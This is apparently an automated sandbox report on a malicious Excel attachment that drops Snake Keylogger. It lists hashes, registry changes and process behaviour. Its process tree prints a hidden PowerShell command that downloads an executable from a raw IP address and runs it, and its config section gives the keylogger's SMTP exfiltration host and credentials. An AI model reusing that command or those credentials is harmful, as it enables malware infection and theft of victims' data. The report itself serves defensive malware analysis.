Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
14-04-2021 20:08
Static task
static1
Behavioral task
behavioral1
Sample
IMG_50_78_63.xls
Resource
win7v20210408
Behavioral task
behavioral2
Sample
IMG_50_78_63.xls
Resource
win10v20210410
General
-
Target
IMG_50_78_63.xls
-
Size
167KB
-
MD5
4c9d3db50cd58ec12305d904d2354f00
-
SHA1
b0a4028da497f94c3d00f0c44a60b40fc369d5bc
-
SHA256
fa0e9c96ef83963d0ab05d58302b13ac57356aed411562c71ef1812066e8ac97
-
SHA512
744fa49552e1cca5a0dc71da06d55f61a4f3380b61974e9306cfc79e91909169261b96e6ee3cc844df2e5e3354771e0468259f3522e21950e35397f0f9fb1a1e
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
nobettwo.xyz - Port:
587 - Username:
folks@nobettwo.xyz - Password:
[FY$nv_Hp[H7
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2028-104-0x0000000000400000-0x000000000046A000-memory.dmp family_snakekeylogger behavioral1/memory/2028-105-0x000000000046479E-mapping.dmp family_snakekeylogger behavioral1/memory/2028-108-0x0000000000400000-0x000000000046A000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 544 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
seesituation.exeseesituation.exepid process 1912 seesituation.exe 2028 seesituation.exe -
Loads dropped DLL 4 IoCs
Processes:
powershell.exeseesituation.exepid process 544 powershell.exe 544 powershell.exe 544 powershell.exe 1912 seesituation.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 checkip.dyndns.org 13 freegeoip.app 14 freegeoip.app -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exeOUTLOOK.EXEdescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\SysWOW64\PerfStringBackup.TMP OUTLOOK.EXE File opened for modification C:\Windows\SysWOW64\PerfStringBackup.INI OUTLOOK.EXE File created C:\Windows\system32\perfc009.dat OUTLOOK.EXE File created C:\Windows\system32\perfh009.dat OUTLOOK.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
seesituation.exedescription pid process target process PID 1912 set thread context of 2028 1912 seesituation.exe seesituation.exe -
Drops file in Windows directory 3 IoCs
Processes:
OUTLOOK.EXEdescription ioc process File created C:\Windows\inf\Outlook\outlperf.h OUTLOOK.EXE File opened for modification C:\Windows\inf\Outlook\outlperf.h OUTLOOK.EXE File created C:\Windows\inf\Outlook\0009\outlperf.ini OUTLOOK.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE -
Modifies registry class 64 IoCs
Processes:
OUTLOOK.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672EB-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F9-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D0-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063102-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303F-0000-0000-C000-000000000046}\ = "Pages" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672D9-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302D-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FB-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302B-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EA-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067352-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672ED-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D2-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D3-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063089-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CA-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D87E7E17-6897-11CE-A6C0-00AA00608FAA}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E8-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006308D-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303F-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063096-0000-0000-C000-000000000046}\ = "_TableView" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063096-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063024-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063087-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303D-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300A-0000-0000-C000-000000000046}\ = "_Explorers" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300F-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307B-0000-0000-C000-000000000046}\ = "OutlookBarGroupsEvents" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A0-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006305A-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DB-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CC-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063074-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063075-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A1-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063005-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006308D-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006308A-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302F-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302F-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672EE-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304E-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F0-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063096-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063104-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DF-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C4-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304F-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309A-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067353-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FA-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063103-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063037-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063104-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302B-0000-0000-C000-000000000046}\ = "ItemEvents_10" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063083-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C4-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A1-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A2-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E2-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D4-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D5-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067368-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063093-0000-0000-C000-000000000046}\ = "_AutoFormatRule" OUTLOOK.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1652 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeseesituation.exeseesituation.exepid process 544 powershell.exe 1912 seesituation.exe 1912 seesituation.exe 2028 seesituation.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeOUTLOOK.EXEseesituation.exeseesituation.exedescription pid process Token: SeDebugPrivilege 544 powershell.exe Token: SeShutdownPrivilege 1728 OUTLOOK.EXE Token: SeDebugPrivilege 1912 seesituation.exe Token: SeDebugPrivilege 2028 seesituation.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
OUTLOOK.EXEpid process 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
OUTLOOK.EXEpid process 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE 1728 OUTLOOK.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
EXCEL.EXEOUTLOOK.EXEpid process 1652 EXCEL.EXE 1652 EXCEL.EXE 1652 EXCEL.EXE 1728 OUTLOOK.EXE -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
OUTLOOK.EXEpowershell.exeseesituation.exedescription pid process target process PID 1728 wrote to memory of 544 1728 OUTLOOK.EXE powershell.exe PID 1728 wrote to memory of 544 1728 OUTLOOK.EXE powershell.exe PID 1728 wrote to memory of 544 1728 OUTLOOK.EXE powershell.exe PID 1728 wrote to memory of 544 1728 OUTLOOK.EXE powershell.exe PID 544 wrote to memory of 1912 544 powershell.exe seesituation.exe PID 544 wrote to memory of 1912 544 powershell.exe seesituation.exe PID 544 wrote to memory of 1912 544 powershell.exe seesituation.exe PID 544 wrote to memory of 1912 544 powershell.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe PID 1912 wrote to memory of 2028 1912 seesituation.exe seesituation.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IMG_50_78_63.xls1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w Hidden Invoke-WebRequest -Uri "http://178.17.171.144/sch/Kqslz.exe" -OutFile "C:\Users\Public\Documents\seesituation.exe";C:\Users\Public\Documents\seesituation.exe2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\seesituation.exe"C:\Users\Public\Documents\seesituation.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\seesituation.exeC:\Users\Admin\AppData\Local\Temp\seesituation.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\seesituation.exeMD5
a8520120160bf0ed2d5f1a62ccd0a2a6
SHA1ddf74b46aee71d32e31e66aad8b3599a5512eea5
SHA256a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
SHA512c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
C:\Users\Admin\AppData\Local\Temp\seesituation.exeMD5
a8520120160bf0ed2d5f1a62ccd0a2a6
SHA1ddf74b46aee71d32e31e66aad8b3599a5512eea5
SHA256a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
SHA512c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
C:\Users\Public\Documents\seesituation.exeMD5
a8520120160bf0ed2d5f1a62ccd0a2a6
SHA1ddf74b46aee71d32e31e66aad8b3599a5512eea5
SHA256a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
SHA512c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
C:\Users\Public\Documents\seesituation.exeMD5
a8520120160bf0ed2d5f1a62ccd0a2a6
SHA1ddf74b46aee71d32e31e66aad8b3599a5512eea5
SHA256a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
SHA512c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
\Users\Admin\AppData\Local\Temp\seesituation.exeMD5
a8520120160bf0ed2d5f1a62ccd0a2a6
SHA1ddf74b46aee71d32e31e66aad8b3599a5512eea5
SHA256a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
SHA512c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
\Users\Public\Documents\seesituation.exeMD5
a8520120160bf0ed2d5f1a62ccd0a2a6
SHA1ddf74b46aee71d32e31e66aad8b3599a5512eea5
SHA256a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
SHA512c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
\Users\Public\Documents\seesituation.exeMD5
a8520120160bf0ed2d5f1a62ccd0a2a6
SHA1ddf74b46aee71d32e31e66aad8b3599a5512eea5
SHA256a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
SHA512c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
\Users\Public\Documents\seesituation.exeMD5
a8520120160bf0ed2d5f1a62ccd0a2a6
SHA1ddf74b46aee71d32e31e66aad8b3599a5512eea5
SHA256a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
SHA512c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
memory/544-80-0x00000000061F0000-0x00000000061F1000-memory.dmpFilesize
4KB
-
memory/544-69-0x0000000001330000-0x0000000001331000-memory.dmpFilesize
4KB
-
memory/544-72-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/544-75-0x00000000057E0000-0x00000000057E1000-memory.dmpFilesize
4KB
-
memory/544-70-0x0000000001332000-0x0000000001333000-memory.dmpFilesize
4KB
-
memory/544-81-0x0000000006470000-0x0000000006471000-memory.dmpFilesize
4KB
-
memory/544-88-0x0000000006390000-0x0000000006391000-memory.dmpFilesize
4KB
-
memory/544-89-0x0000000006500000-0x0000000006501000-memory.dmpFilesize
4KB
-
memory/544-90-0x000000007EF20000-0x000000007EF21000-memory.dmpFilesize
4KB
-
memory/544-71-0x00000000012D0000-0x00000000012D1000-memory.dmpFilesize
4KB
-
memory/544-65-0x0000000000000000-mapping.dmp
-
memory/544-68-0x0000000004820000-0x0000000004821000-memory.dmpFilesize
4KB
-
memory/544-67-0x0000000000D90000-0x0000000000D91000-memory.dmpFilesize
4KB
-
memory/544-66-0x00000000754F1000-0x00000000754F3000-memory.dmpFilesize
8KB
-
memory/1652-60-0x000000002F951000-0x000000002F954000-memory.dmpFilesize
12KB
-
memory/1652-111-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1652-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1652-61-0x0000000070F81000-0x0000000070F83000-memory.dmpFilesize
8KB
-
memory/1912-93-0x0000000000000000-mapping.dmp
-
memory/1912-102-0x0000000000720000-0x000000000075D000-memory.dmpFilesize
244KB
-
memory/1912-101-0x0000000004BA5000-0x0000000004BB6000-memory.dmpFilesize
68KB
-
memory/1912-100-0x0000000000470000-0x0000000000472000-memory.dmpFilesize
8KB
-
memory/1912-99-0x0000000004BA0000-0x0000000004BA1000-memory.dmpFilesize
4KB
-
memory/1912-97-0x0000000001000000-0x0000000001001000-memory.dmpFilesize
4KB
-
memory/2028-104-0x0000000000400000-0x000000000046A000-memory.dmpFilesize
424KB
-
memory/2028-105-0x000000000046479E-mapping.dmp
-
memory/2028-108-0x0000000000400000-0x000000000046A000-memory.dmpFilesize
424KB
-
memory/2028-110-0x0000000004AE0000-0x0000000004AE1000-memory.dmpFilesize
4KB